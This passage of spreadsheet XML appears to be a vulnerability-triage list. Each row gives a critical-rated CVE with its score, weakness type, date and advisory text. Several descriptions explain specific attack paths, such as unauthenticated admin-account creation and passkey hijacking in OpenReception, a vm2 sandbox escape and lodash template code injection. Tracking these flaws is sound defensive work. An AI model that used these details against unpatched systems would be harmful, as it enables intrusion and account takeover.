          <t>CVE-2026-46670</t>
        </is>
      </c>
      <c r="C153" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D153" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E153" s="5" t="inlineStr"/>
      <c r="F153" s="5" t="n">
        <v>0.019</v>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J153" s="5" t="inlineStr"/>
      <c r="K153" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L153" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. Prior to version 4.6.4,  an unauthenticated SQL injection in the Bazar form-import path (`FormManager::create()`) allows any unauthenticated visitor of a default YesWiki install to inject arbitrary SQL into an `INSERT` statement and read the full database, including `yeswiki_users.password` hashes. Version 4.6.4 fixes the issue.</t>
        </is>
      </c>
      <c r="M153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-46670</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47698</t>
        </is>
      </c>
      <c r="C154" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D154" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E154" s="5" t="inlineStr"/>
      <c r="F154" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G154" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H154" s="5" t="inlineStr"/>
      <c r="I154" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="L154" s="5" t="inlineStr">
        <is>
          <t>vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.6, lib/bridge.js and lib/setup-sandbox.js fail to block stacked indirection through Function.prototype.call around dangerous host prototype getter and setter mutators, allowing sandbox code to sever a host intrinsic's prototype chain and reach e.constructor.constructor for arbitrary host command execution. This issue is fixed in version 3.11.6.</t>
        </is>
      </c>
      <c r="M154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47698</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47884</t>
        </is>
      </c>
      <c r="C155" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D155" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E155" s="5" t="inlineStr"/>
      <c r="F155" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G155" s="5" t="inlineStr">
        <is>
          <t>vmware, spring</t>
        </is>
      </c>
      <c r="H155" s="5" t="inlineStr">
        <is>
          <t>vmware:spring_framework</t>
        </is>
      </c>
      <c r="I155" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L155" s="5" t="inlineStr">
        <is>
          <t>Use of XsltView in a Spring MVC application can result in SSRF and RCE attack if the application has an "/**" mapping that results in view rendering, and where the view name is not explicitly specified.
Spring Framework 7.0.0 - 7.0.8
Spring Framework 6.2.0 - 6.2.19
Spring Framework 6.1.0 - 6.1.28
Spring Framework 6.0.0 - 6.0.30
Spring Framework 5.3.0 - 5.3.49
Spring Framework 5.2.25.RELEASE and earlier</t>
        </is>
      </c>
      <c r="M155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47884</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-4800</t>
        </is>
      </c>
      <c r="C156" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D156" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E156" s="5" t="inlineStr"/>
      <c r="F156" s="5" t="n">
        <v>0.028</v>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="inlineStr">
        <is>
          <t>lodash:lodash, lodash:lodash-amd, lodash:lodash-es, lodash:lodash.template</t>
        </is>
      </c>
      <c r="I156" s="5" t="inlineStr">
        <is>
          <t>2026-03-31</t>
        </is>
      </c>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L156" s="5" t="inlineStr">
        <is>
          <t>Impact:
The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.
When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.
Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().
Patches:
Users should upgrade to version 4.18.0.
Workarounds:
Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.</t>
        </is>
      </c>
      <c r="M156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-4800</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48085</t>
        </is>
      </c>
      <c r="C157" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D157" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E157" s="5" t="inlineStr"/>
      <c r="F157" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="inlineStr"/>
      <c r="I157" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L157" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.1, a fully provisioned OpenReception instance accepts unauthenticated POST requests to `/setup/create-admin-account` and creates additional GLOBAL_ADMIN accounts without verifying that an admin already exists. Any unauthenticated network attacker who can submit a same-origin form POST gains full platform-level administrative control. The newly created account is `is_active=true` with `confirmation_state=ACCESS_GRANTED` and does not require completing email confirmation; the GLOBAL_ADMIN row is created active and immediately usable. Login and tenant enumeration succeed without any further interaction. This is distinct from the deployment race condition already documented on the `Claiming an instance` page. That documented race covers the window between deployment and first claim. The bug reported here works after the operator has properly claimed and configured the instance: the layout-level guard that protects the setup page only redirects on GET, while the `default` form action handler creates the user without rechecking `adminExists()`. Three GLOBAL_ADMIN accounts were created in succession during testing, with no rate limiting observed. Audit-specific event logging beyond standard application logs was not assessed; the standard `[error]` line that surfaces only when a uniqueness conflict is hit is not the same as a security event for "additional admin created post-claim". The form post is rejected for browser drive-by CSRF by SvelteKit's built-in same-origin check, but any tool that supplies a matching `Origin` header (curl, Burp, automated scanners, server-side proxies) bypasses this trivially. No additional preconditions exist. Users should upgrade to version 1.0.1 to receive a patch.</t>
        </is>
      </c>
      <c r="M157" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48085</t>
        </is>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B158" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48087</t>
        </is>
      </c>
      <c r="C158" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D158" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E158" s="5" t="inlineStr"/>
      <c r="F158" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G158" s="5" t="inlineStr"/>
      <c r="H158" s="5" t="inlineStr"/>
      <c r="I158" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J158" s="5" t="inlineStr"/>
      <c r="K158" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L158" s="5" t="inlineStr">
        <is>
          <t>OpenReception's appointment booking software provides an end-to-end encrypted appointment booking platform. Prior to version 1.0.2, the registration handler at `POST /api/auth/register/{userId}` validates the relationship between the WebAuthn challenge and the registration cookie's email but never validates that the `userId` in the URL belongs to that email. An unauthenticated attacker requests a challenge for their own email, generates a registration response with their own authenticator, and submits it against any victim user's URL. The challenge-vs-cookie email match passes, the WebAuthn ceremony validates, and `addPasskey` writes the attacker's credential into the victim's `user_passkey` rows. The next victim-email login accepts a passkey assertion from the attacker's authenticator and issues a session as the victim. User IDs are not strictly secret on this platform, but the exact set of exposure surfaces should be assessed by the maintainers. Staff-list endpoints return user IDs to authenticated tenant members per the route signature; live verification of all exposure surfaces (whether user IDs leak through any unauthenticated route, through invite-confirmation URLs, or through other administrative views) is part of the pending live PoC. Where the attacker knows the victim's email and userId, the analysis below becomes account takeover. Version 1.0.2 fixes the issue.</t>
        </is>
      </c>
      <c r="M158" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48087</t>
        </is>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B159" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49819</t>
        </is>
      </c>
      <c r="C159" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D159" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E159" s="5" t="inlineStr"/>
      <c r="F159" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G159" s="5" t="inlineStr"/>
      <c r="H159" s="5" t="inlineStr"/>
      <c r="I159" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J159" s="5" t="inlineStr"/>
      <c r="K159" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-306, CWE-78, CWE-862</t>
        </is>
      </c>
      <c r="L159" s="5" t="inlineStr">
        <is>
          <t>UpSnap is a wake on lan web app. Versions 4.4.1 through 5.3.5 are vulnerable to a missing-authentication / privilege-escalation chain in `pb.HandlerInitSuperuser` (`backend/pb/handlers.go:249`), reachable as `POST /api/upsnap/init-superuser`. The vulnerable code lacks any authentication, setup token, IP allow-list, or rate limit and is gated only by a `totalSuperusers &gt; 0` count check — a condition that is false on every fresh install — allowing an unauthenticated network-adjacent attacker to register the initial superuser account, receive a long-lived JWT, and pivot to root remote code execution at `backend/networking/wake.go:43` (`exec.CommandContext(ctx, "/bin/sh", "-c", wake_cmd)`). Version 5.4.0 fixes the issue.</t>
        </is>
      </c>
      <c r="M159" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49819</t>
        </is>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B160" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49921</t>
        </is>
      </c>
      <c r="C160" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D160" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E160" s="5" t="inlineStr"/>
      <c r="F160" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G160" s="5" t="inlineStr"/>
      <c r="H160" s="5" t="inlineStr"/>
      <c r="I160" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J160" s="5" t="inlineStr"/>
      <c r="K160" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L160" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M160" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t>
        </is>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B161" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50769</t>
        </is>
      </c>
      <c r="C161" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D161" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E161" s="5" t="inlineStr"/>
      <c r="F161" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G161" s="5" t="inlineStr"/>
      <c r="H161" s="5" t="inlineStr"/>
      <c r="I161" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J161" s="5" t="inlineStr"/>
      <c r="K161" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L161" s="5" t="inlineStr">
        <is>
          <t>The CRM+ application before and including version 2025.6 from Brainformatik is vulnerable to SQL Injection (time-based) vulnerability. The check conflict endpoint index.php?module=Appointments&amp;action=CheckConflictOfDates&amp;ajaxSkipHeader=true which is used to check any conflicts for user calendar is vulnerable to SQL injection allowing an attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="M161" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50769</t>
        </is>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B162" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50774</t>
        </is>
      </c>
      <c r="C162" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D162" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E162" s="5" t="inlineStr"/>
      <c r="F162" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G162" s="5" t="inlineStr"/>
      <c r="H162" s="5" t="inlineStr"/>
      <c r="I162" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J162" s="5" t="inlineStr"/>
      <c r="K162" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="L162" s="5" t="inlineStr">
        <is>
          <t>An issue in GAPTEQ Designer v.3.5 allows a remote attacker to escalate privileges via the Company Manger role.</t>
        </is>
      </c>
      <c r="M162" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50774</t>
        </is>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B163" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50775</t>
        </is>
      </c>
      <c r="C163" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D163" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E163" s="5" t="inlineStr"/>
      <c r="F163" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G163" s="5" t="inlineStr"/>
      <c r="H163" s="5" t="inlineStr"/>
      <c r="I163" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J163" s="5" t="inlineStr"/>
      <c r="K163" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L163" s="5" t="inlineStr">
        <is>
          <t>A blind SSRF attack in DataHub v.1.5.0.1 allows a remote attacker to execute arbitrary code via the server retrieving an image from a crafted URL, and it fails to return the content or any errors directly.</t>
        </is>
      </c>
      <c r="M163" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50775</t>
        </is>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B164" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50894</t>
        </is>
      </c>
      <c r="C164" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D164" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E164" s="5" t="inlineStr"/>
      <c r="F164" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G164" s="5" t="inlineStr"/>
      <c r="H164" s="5" t="inlineStr"/>
      <c r="I164" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J164" s="5" t="inlineStr"/>
      <c r="K164" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L164" s="5" t="inlineStr">
        <is>
          <t>easyadmin v2.0.2.2 is vulnerable to Unrestricted Upload of File with Dangerous Type in the background management interface which allows authenticated remote attackers to execute arbitrary code and gain server privileges via a crafted file upload.</t>
        </is>
      </c>
      <c r="M164" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50894</t>
        </is>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B165" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51190</t>
        </is>
      </c>
      <c r="C165" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D165" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E165" s="5" t="inlineStr"/>
      <c r="F165" s="5" t="n">
        <v>0.013</v>
      </c>
      <c r="G165" s="5" t="inlineStr"/>
      <c r="H165" s="5" t="inlineStr"/>
      <c r="I165" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J165" s="5" t="inlineStr"/>
      <c r="K165" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L165" s="5" t="inlineStr">
        <is>
          <t>The "s init" command in Serverless-Devs @serverless-devs/s &lt;= 3.1.11 passes unsanitized user input to child_process.spawn() with shell: true. A URL ending in ".git" bypasses the only input check, allowing OS command injection when a user runs "s init" with an attacker-controlled argument.</t>
        </is>
      </c>
      <c r="M165" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51190</t>
        </is>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B166" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-51775</t>
        </is>
      </c>
      <c r="C166" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D166" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E166" s="5" t="inlineStr"/>
      <c r="F166" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G166" s="5" t="inlineStr"/>
      <c r="H166" s="5" t="inlineStr"/>
      <c r="I166" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J166" s="5" t="inlineStr"/>
      <c r="K166" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L166" s="5" t="inlineStr">
        <is>
          <t>SQL injection vulnerability in Fastadmin v.1.6.1.20250430 allows an attacker to exectue arbitrary code via the application/common/controller/Backend.php component</t>
        </is>
      </c>
      <c r="M166" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-51775</t>
        </is>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B167" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52098</t>
        </is>
      </c>
      <c r="C167" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D167" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E167" s="5" t="inlineStr"/>
      <c r="F167" s="5" t="inlineStr"/>
      <c r="G167" s="5" t="inlineStr"/>
      <c r="H167" s="5" t="inlineStr"/>
      <c r="I167" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J167" s="5" t="inlineStr"/>
      <c r="K167" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L167" s="5" t="inlineStr">
        <is>
          <t>An issue in Flowise 3.1.2 allows a remote attacker to execute arbitrary code via the /api/v1/prediction/&lt;flowId&gt; endpoint</t>
        </is>
      </c>
      <c r="M167" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52098</t>
        </is>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B168" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52102</t>
        </is>
      </c>
      <c r="C168" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D168" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E168" s="5" t="inlineStr"/>
      <c r="F168" s="5" t="n">
        <v>0.018</v>
      </c>
      <c r="G168" s="5" t="inlineStr"/>
      <c r="H168" s="5" t="inlineStr"/>
      <c r="I168" s="5" t="inlineStr">
        <is>
          <t>2026-08-03</t>
        </is>
      </c>
      <c r="J168" s="5" t="inlineStr"/>
      <c r="K168" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L168" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the openmediavault-md plugin of OpenMediaVault v8.0.4-1 allows attackers to execute arbitrary commands as root via injecting shell metacharacters.</t>
        </is>
      </c>
      <c r="M168" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52102</t>
        </is>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B169" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52103</t>
        </is>
      </c>
      <c r="C169" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D169" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E169" s="5" t="inlineStr"/>
      <c r="F169" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G169" s="5" t="inlineStr"/>
      <c r="H169" s="5" t="inlineStr"/>
      <c r="I169" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J169" s="5" t="inlineStr"/>
      <c r="K169" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L169" s="5" t="inlineStr">
        <is>
          <t>A zero-click remote code execution (RCE) vulnerability in the /Terminal/Notification.hs component of SimpleX Chat before v6.5 allows attackers to execute arbitrary commands in the context of the application without user interaction via sending a crafted payload in a text message.</t>
        </is>
      </c>
      <c r="M169" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52103</t>
        </is>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B170" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52111</t>
        </is>
      </c>
      <c r="C170" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D170" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E170" s="5" t="inlineStr"/>
      <c r="F170" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G170" s="5" t="inlineStr"/>
      <c r="H170" s="5" t="inlineStr"/>
      <c r="I170" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J170" s="5" t="inlineStr"/>
      <c r="K170" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L170" s="5" t="inlineStr">
        <is>
          <t>An issue in fast-note-sync-service &lt;=2.13.7 allows a remote attacker to escalate privileges via the admin configuration endpoint exposes authTokenKey</t>
        </is>
      </c>
      <c r="M170" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52111</t>
        </is>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B171" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52466</t>
        </is>
      </c>
      <c r="C171" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D171" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E171" s="5" t="inlineStr"/>
      <c r="F171" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G171" s="5" t="inlineStr"/>
      <c r="H171" s="5" t="inlineStr"/>
      <c r="I171" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J171" s="5" t="inlineStr"/>
      <c r="K171" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L171" s="5" t="inlineStr">
        <is>
          <t>Open Library Foundation VuFind v11.0.3 and v4.1 is vulnerable to toInorrect Access Control. The application fails to stop processing an incoming request in VuFind\Controller\AbstractBase::validateAccessPermission after it has found that controller level access permissions do not allow access to the requested function. The requester receives a response indicating that access was denied, but the actual function is executed regardless of that.</t>
        </is>
      </c>
      <c r="M171" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52466</t>
        </is>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B172" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52490</t>
        </is>
      </c>
      <c r="C172" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D172" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E172" s="5" t="inlineStr"/>
      <c r="F172" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G172" s="5" t="inlineStr">
        <is>
          <t>db2</t>
        </is>
      </c>
      <c r="H172" s="5" t="inlineStr"/>
      <c r="I172" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J172" s="5" t="inlineStr"/>
      <c r="K172" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L172" s="5" t="inlineStr">
        <is>
          <t>An issue in libtiff 85f2ac8e0b01cb7db2bbecf4a3b891bdbef67938 allows an attacker to execute arbitrary code via the process_command_opts() function in tools/tiffcrop.c</t>
        </is>
      </c>
      <c r="M172" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52490</t>
        </is>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B173" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52889</t>
        </is>
      </c>
      <c r="C173" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D173" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E173" s="5" t="inlineStr"/>
      <c r="F173" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G173" s="5" t="inlineStr"/>
      <c r="H173" s="5" t="inlineStr"/>
      <c r="I173" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J173" s="5" t="inlineStr"/>
      <c r="K173" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="L173" s="5" t="inlineStr">
        <is>
          <t>Formie is a Craft CMS plugin for creating forms. Prior to 3.1.27, Formie can pass request-derived Hidden field defaults such as HTTP User Agent, Referer URL, Current URL, Current URL without Query String, Query Parameter, and Cookie Value to Craft's Twig rendering layer during front-end form rendering. An unauthenticated attacker can place Twig syntax in one of these request-controlled inputs when a public form contains an affected Hidden field. Hidden::getFrontEndInputOptions() then assigns the value to defaultValue and calls renderString, causing server-side template evaluation rather than treating the request data as a plain string. Depending on the Craft site configuration and available Twig capabilities, exploitation can disclose sensitive information, modify application state, or achieve remote code execution. This issue is fixed in version 3.1.27.</t>
        </is>
      </c>
      <c r="M173" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52889</t>
        </is>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B174" s="5" t="inlineStr">
        <is>
